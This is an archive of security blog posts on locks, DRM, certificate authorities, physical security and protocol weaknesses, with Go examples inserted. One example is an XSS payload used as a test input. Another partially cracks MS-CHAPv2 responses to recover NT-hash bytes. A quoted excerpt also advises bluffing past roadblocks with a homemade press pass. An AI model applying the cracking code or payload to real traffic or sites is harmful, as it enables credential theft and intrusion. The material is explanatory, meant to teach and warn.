Monday, May 13, 2013

Securology's Open Source Repository on GitHub

Securology now has open source code on GitHub!
https://github.com/Securology

This is something we have wanted to do for some time and are finally able to do!  As our contributors find the time and freedom to contribute some of our intellectual property back to the community at large, we will add more repositories and content there.

Our first offering is a C# .NET wrapper that can do more to manage Microsoft Active Directory instances (including Active Directory Lightweight Directory Services, formerly known as ADAM, or Active Directory Application Mode) than any other open source project we are aware of (which is why we wrote it in the first place).  Our open source Active Directory Services repo is available here:
https://github.com/Securology/ActiveDirectoryServices

In addition to shipping a core library that extends the out-of-the-box functionality in the .NET runtime (System.DirectoryServices.AccountManagement), we also have fully working example applications that consume the library, so you can see how to use all of the features we have built.

Here's a list of just some of the features our consumer applications can do:

  • Create, Edit, Update, and Delete Active Directory objects: Users, Groups, Organizational Units (OUs), Contacts, etc.
  • Create, Edit, Update, and Delete AD-LDS (ADAM) UserProxy and UserProxyFull objects.
  • Sync AD Users into an AD-LDS (ADAM) instance as UserProxy or UserProxyFull objects.
  • Create, Update, Delete, and generally manage/sync dynamic AD security/distribution groups based upon reporting relationships (if those are defined within Active Directory).
  • Enable, set, and maintain Microsoft Exchange attributes to enable objects to become visible in the GAL (Global Address List), which also works for Microsoft's Exchange Online hosted service via DirSync.
  • Import various rooms and resources from a .CSV file into Active Directory and enable their visibility in the Exchange GAL.
  • Enable and Manage Office Communicator/Lync attributes to turn on/off access to your company's Lync/OCS server, setup default policies, including access to any internet-facing proxy servers as well as archive/logging per user.
  • Generate random passwords for users.
  • A nifty way of "snoozing" an AD user's password expiration while keeping the same password.
  • And much more...
Eventually, we will share a working Provisioning Web Service that will be a great solution for limited budget organizations that want some of the functionality Microsoft's Identity Lifecycle Manager (ILM) includes, without the heftier license cost and infrastructure requirements.

More follow-up posts to come.

Tuesday, February 12, 2013

Breaking into Kaba Door Locks

This is an older issue that was resolved by an update from the manufacturer, but it's still an interesting story.

Continuing from yesterday, Marc Weber Tobias was also instrumental in getting Kaba to update their Simplex push-button mechanical combination locks.  On those door locks, which have seen near-ubiquitous deployment, a mechanical combination entered on a push-button keypad unlocks the door.  Some models include other features, like a "bypass" that lets a person inside exit through the door without pushing the combination.  It's this feature on the Kaba lock that Tobias learned could be defeated with a rare earth magnet.

Here's a (slightly dry) walk-through of how the lock is defeated using just a magnet, leaving no forensic evidence of unauthorized entry whatsoever:


One aspect of this story that will interest computer security professionals is the "responsible disclosure" Tobias used to try to force the manufacturer's hand, followed by the manufacturer's all-too-familiar "there is no such problem" response (and yet they fixed it).

Monday, February 11, 2013

Breaking Physical Locks

Recently, Wired Magazine ran an article about just how easy it is for children to break into certain models of gun safes.  Their findings are interesting, but not totally surprising.  Watch for yourself if you haven't already seen it:


We did our own review of pistol safes here, but more or less comparing features of safes, not attempting to penetrate them as the article describes.

One of the researchers, Marc Weber Tobias, has a variety of other very interesting (but dry) videos describing physical lock security and some of the particular products that are defeated.  His YouTube channel is worth a review.


Friday, October 26, 2012

Sony's PS3 DRM Cracked

Anyone who pays any attention to DRM will extrapolate the general principle:
You can never prevent an end-user who has physical control of a device from breaking any DRM scheme you can invent.
Sony just learned their DRM lesson (again).  I'm sure that people at Sony already know this principle, but some "suit" tells the engineers to "do something about the problem" so they implement a technical speed bump. That's all it is and will ever be.

Thursday, October 18, 2012

Skeleton Keys

Wouldn't it be really scary if physical locks in large planned cities like NYC were designed to use skeleton keys-- master keys shared with do-gooder firefighters and locksmiths alike-- without anyone ever thinking about what could happen if such keys got into the hands of the average Joe, whose do-gooder status is unknown?  Yep, it would.

Look but don't pay attention to key teeth details!
Wouldn't it be even scarier if those who cried "the sky is falling, the sky is falling" were also dumb enough to post high-resolution photos of the skeleton keys on their websites (pictured left), so that anyone with access to key blanks and tools could easily measure the cuts and make their own copies?  Again, yes.

Saturday, October 13, 2012

Picking Handcuffs

Because you never know when you just might need to have this skill:

Saturday, October 6, 2012

Finally a Safe Hello World

It's very common for Hello World example apps in textbooks and other educational literature to promote insecure software building practices right out of the gate.  What a breath of fresh air to see the Microsoft MVC folks HTML-encoding output by default (Razor's @ syntax encodes, so the simple path is the safe one) to avoid XSS in their MVC4 Hello World application!
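The same encode-by-default principle, shown in Go as an added example (this is not the MVC4 sample and not the post's code): text/template substitutes values verbatim, the way a naive Hello World does, while html/template escapes every interpolated value, the way Razor's @ does.  The attacker input is a constructed string, and the third function shows the one way to reopen the hole, explicitly marking a value as trusted HTML (the Html.Raw equivalent).

```go
package main

import (
	"bytes"
	"fmt"
	htmltmpl "html/template"
	texttmpl "text/template"
)

// view is the Hello World page with one user-supplied value dropped into it.
const view = `<h1>Hello, {{.Name}}!</h1>`

// hostileName is a constructed attacker payload for this example.
const hostileName = `<script>alert(document.cookie)</script>`

// renderTextbook is the usual textbook version: the value is substituted
// verbatim, so any markup in it becomes part of the page (reflected XSS).
func renderTextbook(name string) string {
	var out bytes.Buffer
	t := texttmpl.Must(texttmpl.New("hello").Parse(view))
	if err := t.Execute(&out, map[string]string{"Name": name}); err != nil {
		panic(err)
	}
	return out.String()
}

// renderEncoded is the MVC4-style version: html/template escapes every
// interpolated value by default, which is what Razor's @ does.
func renderEncoded(name string) string {
	var out bytes.Buffer
	t := htmltmpl.Must(htmltmpl.New("hello").Parse(view))
	if err := t.Execute(&out, map[string]string{"Name": name}); err != nil {
		panic(err)
	}
	return out.String()
}

// renderOptOut shows the hole reopening: wrapping the value in template.HTML
// declares it trusted markup (the equivalent of Html.Raw in MVC), so the
// payload is emitted unencoded again. Grep for this type in code review.
func renderOptOut(name string) string {
	var out bytes.Buffer
	t := htmltmpl.Must(htmltmpl.New("hello").Parse(view))
	if err := t.Execute(&out, map[string]htmltmpl.HTML{"Name": htmltmpl.HTML(name)}); err != nil {
		panic(err)
	}
	return out.String()
}

func main() {
	fmt.Println("textbook:", renderTextbook(hostileName))
	fmt.Println("encoded: ", renderEncoded(hostileName))
	fmt.Println("opt-out: ", renderOptOut(hostileName))
}
```

The point of the third function is the same one the MVC4 sample makes implicitly: the safe behaviour should be the default, and the unsafe one should require a visible, greppable opt-in.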

Friday, October 5, 2012

Coping with Compromised Certificate Authorities

With the news full of stories of malware being distributed via compromised Certificate Authorities, it makes sense that some IT security blogs would address "what to do" if this happens to your CA.  This blog post gets it wrong, though:
What would you do if you found out that the Certificate Authority that provides Digital Certificates to your company was compromised, and Microsoft was adding the Certificate Authority’s public key to Windows un-trusted Root Store? Well if you have not got a contingency plan to implement then I can presume you will be in a panic to purchase new certificates from another Certificate Authority... It can take Certificate Authorities (CAs) a few days to validate domain ownership and company registration details... While all this is happening your customers are getting a message from Internet Explorer that your SSL certificate is not to be trusted.
What can you do?
  • Do not rely on one Certificate Authority for all of your certificates. You should have a relationship with at least two well known Certificate Authorities and the CAs should have validated all of your domains. This will let you quickly order Digital Certificates from the second CA without having to go through the company validation process...
  • If you cannot tolerate any downtime for a service you can take the extra step in which you create backup certificates for each service using your backup Certificate Authority. This will enable you to implement the backup certificates without having to contact the second CA and joining the queue of companies looking for new certificates.
Keep in mind that the worst-case scenario described above, the CA's root certificate landing in the untrusted store, normally follows a compromise of the root CA itself.  Most root CA keys are kept offline: the machines that hold them are powered off except when a new intermediate CA certificate has to be signed, or they sit on an air-gapped network (disconnected from the internet) reachable only by sneakernet.  Exploiting an offline root is a big deal, and if it happens it won't be just your organization that is affected, but likely a large part of the entire internet.  One caveat: the browser and OS root programs can also yank a root when the CA's online issuing systems are breached and it cannot account for what was issued, which is what happened to DigiNotar in 2011, so a pre-issued backup chain from a second CA is cheap insurance even though the scenario is rare.

So a much more plausible outcome:
  • The CA creates a new intermediate CA certificate and re-issues certificates to all of its paying customers.
In other words: nothing to see here, please move along.
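The second bullet in the quoted advice, pre-issued backup certificates, is the part worth keeping regardless of how likely the scenario is, because the swap is mechanical once the backup exists.  The following Go program is an added example written for this post (it is not from the quoted blog or from any CA's tooling): it builds two throwaway roots in memory, issues a server certificate from each, and selects whichever candidate still chains to a root the clients trust, before and after the primary root is dropped from the client trust store.  The CA names, the host name and the in-memory key generation are all constructed for the example.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

func must(err error) {
	if err != nil {
		panic(err)
	}
}

// ca is a throwaway certificate authority held in memory for this example.
type ca struct {
	cert *x509.Certificate
	key  *ecdsa.PrivateKey
}

// sign generates a fresh P-256 key and certifies it from tmpl; with a nil
// parent the certificate is self-signed (a root).
func sign(tmpl, parent *x509.Certificate, parentKey *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	must(err)
	if parent == nil {
		parent, parentKey = tmpl, key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, &key.PublicKey, parentKey)
	must(err)
	cert, err := x509.ParseCertificate(der)
	must(err)
	return cert, key
}

func newRoot(name string) ca {
	cert, key := sign(&x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: name},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign,
	}, nil, nil)
	return ca{cert, key}
}

// issueServerCert is the CA's side of "validated all of your domains". The
// leaf key is dropped here; a real server keeps it next to the certificate.
func (c ca) issueServerCert(host string) *x509.Certificate {
	cert, _ := sign(&x509.Certificate{
		SerialNumber: big.NewInt(2),
		Subject:      pkix.Name{CommonName: host},
		DNSNames:     []string{host},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}, c.cert, c.key)
	return cert
}

// pickServable returns the index of the first candidate that still chains to a
// root the clients trust, or -1. Candidates are in order of preference, so the
// primary CA's cert is served until its root is gone from the client store.
func pickServable(candidates []*x509.Certificate, clientRoots *x509.CertPool, host string) int {
	for i, c := range candidates {
		if _, err := c.Verify(x509.VerifyOptions{Roots: clientRoots, DNSName: host}); err == nil {
			return i
		}
	}
	return -1
}

// runScenario stages one certificate from each of two CAs, then models the
// primary root being pulled from client trust stores. It returns which
// candidate is served before and after that distrust.
func runScenario(host string) (before, after int) {
	primary, backup := newRoot("Primary CA Root"), newRoot("Backup CA Root")
	candidates := []*x509.Certificate{primary.issueServerCert(host), backup.issueServerCert(host)}
	both := x509.NewCertPool()
	both.AddCert(primary.cert)
	both.AddCert(backup.cert)
	before = pickServable(candidates, both, host)
	backupOnly := x509.NewCertPool()
	backupOnly.AddCert(backup.cert)
	after = pickServable(candidates, backupOnly, host)
	return before, after
}

func main() {
	before, after := runScenario("www.example.com")
	fmt.Println("served candidate with both roots trusted:", before)
	fmt.Println("served candidate after primary root distrusted:", after)
}
```

In a real deployment the candidate list is the primary and backup chains plus their private keys already on the server, and "clients trust" means the OS and browser root stores rather than a pool you control; the point is that once the backup chain and key are on the box, failing over is a configuration change, not a place in the CA's validation queue.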

Thursday, September 27, 2012

Vauban Star Fortifications

Bourtange Star Shaped Fort
Taking a blast from the past that still has some application in today's physical security landscape: star-shaped forts built on the Vauban principle of military engineering.

Acute angles at the corners of a building are added to the architectural design to eliminate "dead zones" in which an adversary could hide or take refuge.  At the time of the star-shaped fortifications, the competing designs all employed rounded towers or turrets at each corner, typically to house archers.  As a breaching force approached a rounded corner, it could hide from the archers behind the very fortifications intended to be an asset to the defenders.

Acute angles, however, prevented the breaching force from seeking shelter along the very walls intended to shelter the defenders.  [See the illustration, below right.]

Modern applications against a well-equipped adversary are very limited, since air power ruined traditional fort designs (adversaries can simply rain fire from above).  Against a low-tech insurgency, however, the classic star design still holds up.

There are also applications for the acute corners in modern civil architecture.

For example, for an HVT (High Value Target) such as a celebrity, a bank CEO, or anyone else who might employ a private security detail, these corners help deter snatch-and-grab and similar attacks by simply limiting the avenues of approach.  Col. Jeff Cooper, famous for his teaching on small arms, was fascinated enough with these acute angles that the term "Cooper Corners" was coined for this much older design.

In public civil architecture, there are obvious applications in places such as bank vaults, manufacturing facilities where the likelihood of espionage is high, and even public restrooms in semi-remote, semi-private yet public places like city parks, where the likelihood of an after-dark robbery or sexual assault is high.  In the case of the park (along with a well-designed layout of lighting, landscaping, and shrubbery), the acute angles may be just the trick to eliminate lie-in-wait hiding places.

The next time you are tasked with securing a high value asset at a physical location, familiarity with the acute angles of the star fort might be the exact tool you need to pull out of your security toolbox.

Wednesday, September 26, 2012

Avoiding Protests with a DIY Press Pass

Do you live in an area that is likely to have civil unrest and protests?  Perhaps having a Press Pass may get you out of trouble.  ITS Tactical ran an article on just how to do this.

An excerpt:
Protesting is About Attention! Use that to your advantage. Protesters love the press. It can be a relatively simple proposition to get a press pass that will get you through/past protests that completely block traffic. Afterwards, ask them for a letter stating you have written for them, etc.
  • Set up a blog using a free service like Blogger or WordPress.
  • Write an “About” page or article telling people that this blog is for covering local protests or demonstrations
  • Design your own press ID using a template (Here’s an example template). Don’t lie on the pass. It’s not necessary.
  • Print it on a solid plastic card. There are tons of companies that will do this for a few bucks. (Here are a few) I had mine printed locally for about $.80 each.
  • Throw the ID on a lanyard or in an ID armband and stash it in the glove compartment for whenever you may need it.
  • If you have to use it, present it with authority!  It has never failed me, even under the scrutiny of armed soldiers at roadblocks.

Friday, September 21, 2012

Destroying Paper Documents

The folks over at ITS Tactical have an interesting article on securely disposing paper documents.

Here is an excerpt:

Reconstruction

The reconstruction of sensitive documentation has been around as long as shredders have. According to a fantastic NY Times article that everyone should read, reconstruction was first brought to light during the 1979 US Embassy takeover in Tehran. The Iranians elicited the help of local carpet weavers to reconstruct sensitive documents, which were sold on the streets of Tehran as a testament to US imperialism.

Just know that with some time and even the help of computer programs like Unshredder, there isn’t much reassurance that your documents will stay shredded.


Document Burn Bag
ITS Tactical also sells "Burn Bags" for important documents (or shreddings from documents) at a reasonable price, just like the kind you'd find at government agencies or in the movies.

Tuesday, September 11, 2012

Lock Kill

Do you have a house or door key lock that you no longer want somebody to be able to unlock, but you don't have time to change the locks?  Maybe you're a landlord?  Or maybe you have some hidden purpose, such as forcing door traffic to a different entry to the building?

LockKill has a solution: a specialty key designed to slip in, ride past the pins far enough to seat fully, and then shear off in place, destroying the lock.  It only takes a few seconds.

Warning: the only real way to bring that lock back from the dead is to replace it.

Watch the review by ITS Tactical:

Saturday, September 8, 2012

Cognitive Side Channels

A recent media buzz this week involves so-called "side channel" attacks, leakage of information through brain-computer interfaces.  Not a ubiquitous technology today, but quite possibly down the road.

Essentially, the attacks work by showing a subject wearing a consumer EEG headset an image of, say, a bank, at which point the subject's mind involuntarily races down the neural paths for things like account numbers, PINs, maybe balances or recent expenditures.  The recognition response the headset picks up (the P300 signal the researchers used) leaks which of the displayed options is familiar, and that is enough to narrow down otherwise private facts inside the subject's brain.

Sound scary?  It is.  The brain wasn't designed to keep information from itself.  Count us out of the "early adopter program".

Reminds us of the time the Ghostbusters were told the worst thing they could think of would be their next enemy:

Friday, August 24, 2012

Protecting Cars from Viruses

Reuters is running a story that should amuse any computer security professional: Experts hope to shield cars from computer viruses.

An excerpt:

Intel's McAfee unit, which is best known for software that fights PC viruses, is one of a handful of firms that are looking to protect the dozens of tiny computers and electronic communications systems that are built into every modern car.

It's scary business. Security experts say that automakers have so far failed to adequately protect these systems, leaving them vulnerable to hacks by attackers looking to steal cars, eavesdrop on conversations, or even harm passengers by causing vehicles to crash.
Our guess is that when cars get to the point of driving themselves, those who understand how malware works (and, more importantly, how undeniably complicated modern software and its hardware architecture can be) will don a pair of Converse Chuck Taylors and, like a modern Luddite, drive themselves, a la Will Smith in I, Robot.

When you look at the statistics, you are far more likely to be injured or die in a car accident than from nearly any other security risk you face in daily life.  Even with the regulation of the airline industry and its pilots, it's not possible to keep air travel 100% safe, though it's safer than driving (once you get past the TSA checkpoint).

Computerized, self-driving cars may improve (emphasis on "may") the safety statistics; however, not if their software landscape looks like anything else we operate with a CPU in it these days.  There are agencies with operating budgets larger than the GDP of several nations that are terrified of malware injected into military aircraft or missile guidance systems.  Given that, how in the world is a ~$20K automobile (at most 1% of the price tag of the military's concerns) ever going to be 100% free of malware?  Simple: it won't be.
Toyota Motor Corp, the world's biggest automaker, said it was not aware of any hacking incidents on its cars.
"They're basically designed to change coding constantly. I won't say it's impossible to hack, but it's pretty close," said Toyota spokesman John Hanson. [emphasis ours]
Oh, we've never heard that before...

Officials with Hyundai Motor Co, Nissan Motor Co and Volkswagen AG said they could not immediately comment on the issue.

A spokesman for Honda Motor Co said that the Japanese automaker was studying the security of on-vehicle computer systems, but declined to discuss those efforts.
Mum's the word is a much smarter response to the press.
A spokesman for the U.S. Department of Homeland Security declined to comment when asked how seriously the agency considers the risk that hackers could launch attacks on vehicles or say whether DHS had learned of any such incidents.
They probably declined to comment because they are working on exploits of their own.  Say it ain't so?  Look no further than Stuxnet and Flame, which 2012 press reporting attributed to the US government (though it has never officially claimed them).  It's the future of the "cyberwarfarestate".

We can't keep malware out of critical infrastructure SCADA systems.  There's no way we can keep it out of your mom's minivan.

Thursday, August 16, 2012

Classic Trust

Ken Thompson is on the left. That's not Adam Savage on the right.
If you work in computer security or software development and have never read Unix co-creator Ken Thompson's 1984 Turing Award lecture "Reflections on Trusting Trust", then you are hereby obliged to at least read the following snippet for today's history lesson, which is just as relevant (actually more so) today:
The moral is obvious. You can't trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect.
Ken was referring to the trojan he embedded into the C compiler, illustrating that you have to trust more than the source code: the compiler, the assembler, the loader, all the way down to the CPU's microcode, and a backdoor at any of those levels survives source review of everything above it.  Or as Schneier famously put it: "security is a chain; only as strong as its weakest link".

Who operates on a completely self-built system from software to hardware?  We would venture to say: nary a soul.

Just a good reminder for a random Thursday, in case you forgot.

Monday, August 13, 2012

Hacking Hotels

Breaking into a hotel room with less than $50 in hardware
The technical security media has been abuzz about a recent Black Hat presentation by Cody Brocious on hacking electronic hotel door locks.

The original author's documentation including the paper and slides are here.

Here's the simplified version:
  • The vendor of the locks has an overwhelming majority of the market in the U.S. (chances are you stayed in a room that had this exact lock on it)
  • The key cards use crypto for implementing the access control
  • The mathematical aspect of the crypto is more or less fine (as is usually the case)
  • The problem comes in managing keys (which is pretty much always the problem!)
  • An administrative feature is easily exploited-- which is only slightly better than vendors shipping products with widely-known default passwords.
  • An administrative maintenance device, when connected, can extract the crypto key and break the access control
  • You can roll your own maintenance device on the very, very cheap
  • Yes, this probably looks like a scene in any random Hollywood movie
  • This will likely be a majorly expensive pain to fix for the vendor and hotels
  • "Compensating controls" in this case include surveillance cameras, the internal manual deadbolt, etc.

Wednesday, August 8, 2012

MS-CHAPv2 Crack

It should come as no real surprise: MS-CHAPv2 is broken.  It's an ancient scheme.  If you were paying attention, you migrated your VPNs (PPTP in particular) and wireless networks away from it years ago.

Here's a great breakdown of what this means for your wireless networks.

Even simpler: just note that these combinations are still fine:
  • IPsec and OpenVPN are fine.  PPTP, which runs MS-CHAPv2 with nothing wrapped around it, is the VPN to retire.
  • WPA2 Enterprise wireless with PEAP is fine, with one caveat: the TLS tunnel is the only thing protecting the inner MS-CHAPv2 exchange, so clients must be configured to validate the RADIUS server's certificate.  A rogue access point presenting a certificate the client accepts captures the handshake and is in exactly the position this attack needs.
  • WPA2 non-Enterprise (i.e. home, pre-shared key) wireless is fine (from this).
And, of course, keep in mind that the attack still needs a full 2^56 single-DES key search, which the FPGA cracking service released alongside it finishes in under 24 hours (right now; that's sure to be sped up).  Since it's 24 hours and not 24 ms, an attacker won't just casually stumble across you and exploit you.  Your network will have to be a target first, at least to some degree.
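To make "broken" concrete, here is an added Go example (not code from the original post or from the breakdown it links) that builds the MS-CHAPv2 NT-Response exactly as RFC 2759 specifies and then runs the cheap half of the attack.  The inputs are the RFC 2759 section 9 test vectors; the NT hash is pasted in rather than computed because Go's standard library has no MD4.  The third DES key carries only two bytes of the NT hash, so it falls to a 65,536-try search in milliseconds; the first two keys encrypt the same plaintext, so one pass over the 2^56 single-DES key space (not run here) recovers both, which is why the whole thing costs one DES crack rather than three.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
	"math/bits"
)

// Inputs are the RFC 2759 section 9 test vectors (user "User", password
// "clientPass"). The NT hash is MD4 of the UTF-16LE password; it is pasted in
// because Go's standard library has no MD4.
var (
	username      = "User"
	authChallenge = mustHex("5B5D7C7D7B3F2F3E3C2C602132262628")
	peerChallenge = mustHex("21402324255E262A28295F2B3A337C7E")
	ntHash        = mustHex("44EBBA8D5312B8D611474411F56989AE")
)

func mustHex(s string) []byte {
	b, err := hex.DecodeString(s)
	if err != nil {
		panic(err)
	}
	return b
}

// expandDesKey spreads a 7-byte key over the high 7 bits of 8 bytes and sets
// odd parity in each low bit, as RFC 2759's DesEncrypt does.
func expandDesKey(k []byte) []byte {
	k8 := []byte{
		k[0] & 0xFE, (k[0]<<7 | k[1]>>1) & 0xFE, (k[1]<<6 | k[2]>>2) & 0xFE,
		(k[2]<<5 | k[3]>>3) & 0xFE, (k[3]<<4 | k[4]>>4) & 0xFE,
		(k[4]<<3 | k[5]>>5) & 0xFE, (k[5]<<2 | k[6]>>6) & 0xFE, (k[6] << 1) & 0xFE,
	}
	for i := range k8 {
		if bits.OnesCount8(k8[i])%2 == 0 {
			k8[i] |= 1
		}
	}
	return k8
}

// desEncrypt is one single-DES block encryption under a 7-byte key.
func desEncrypt(key7, block []byte) []byte {
	c, err := des.NewCipher(expandDesKey(key7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// challengeHash = SHA1(PeerChallenge || AuthenticatorChallenge || UserName)[:8].
func challengeHash(peer, auth []byte, user string) []byte {
	h := sha1.New()
	h.Write(peer)
	h.Write(auth)
	h.Write([]byte(user))
	return h.Sum(nil)[:8]
}

// ntResponse is RFC 2759's ChallengeResponse: zero-pad the 16-byte NT hash to
// 21 bytes, cut it into three 7-byte DES keys, and encrypt the same 8-byte
// challenge hash under each. The weakness is visible here: key 3 holds only
// two real hash bytes, and keys 1 and 2 encrypt identical plaintext.
func ntResponse(hash, chal []byte) []byte {
	padded := make([]byte, 21)
	copy(padded, hash)
	resp := make([]byte, 0, 24)
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncrypt(padded[7*i:7*i+7], chal)...)
	}
	return resp
}

// recoverHashTail brute-forces key 3 from a captured challenge hash and the
// last 8 response bytes: 2^16 candidates, so it finishes in milliseconds.
func recoverHashTail(chal, c3 []byte) ([]byte, bool) {
	key := make([]byte, 7)
	for cand := 0; cand < 1<<16; cand++ {
		key[0], key[1] = byte(cand>>8), byte(cand)
		if bytes.Equal(desEncrypt(key, chal), c3) {
			return []byte{key[0], key[1]}, true
		}
	}
	return nil, false
}

// matchesKey1or2 is the per-candidate test of the 2^56 search (not run here):
// because keys 1 and 2 encrypt the same plaintext, one pass over the DES key
// space finds both, which is the reduction that makes this a single-DES crack.
func matchesKey1or2(cand, chal, c1, c2 []byte) bool {
	ct := desEncrypt(cand, chal)
	return bytes.Equal(ct, c1) || bytes.Equal(ct, c2)
}

func main() {
	chal := challengeHash(peerChallenge, authChallenge, username)
	resp := ntResponse(ntHash, chal)
	fmt.Printf("challenge hash: %X\nNT-Response:    %X\n", chal, resp)
	tail, ok := recoverHashTail(chal, resp[16:24])
	fmt.Printf("NT hash bytes 14-15 from key 3: %X (found=%v)\n", tail, ok)
	fmt.Println("real key 1 would be hit by the 2^56 search:", matchesKey1or2(ntHash[:7], chal, resp[:8], resp[8:16]))
}
```

Swap in a captured challenge and response from a PPTP or unprotected EAP exchange and the same recoverHashTail call yields two bytes of the victim's NT hash; the remaining fourteen are what the day-long single-DES search recovers.  Note what the NT hash buys the attacker: MS-CHAPv2 authenticates with the hash directly, so for this protocol it is as good as the password.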

Tuesday, May 1, 2012

Skype Leak

Skype has had its moments in security history over the past several years, like the allegations that the governments of certain countries have backdoors (neither substantiating nor denying those here), but now it appears that if you know a Skype username, you can find out that user's IP address.  Wow.

Saturday, April 21, 2012

Chances of Dying (InfoGraphic)



This is an interesting infographic that is floating around that depicts the statistical likelihood of dying from any given event.

It's a commonly known fact that societies tend to focus irrationally on certain threats over realistic ones, and this infographic just might help dispel some irrational fears that you hold.

For example, I was surprised to see that skydiving is less risky behavior than driving a car in traffic, which I do quite regularly.  Looks like it may even be roughly as dangerous as flying commercially (well, except you probably won't have to deal with the TSA when you get on that prop plane at a small rural airport prepping for your skydive).

Note how dangerous any mountaineering is in Nepal.  Ouch.  Not great odds.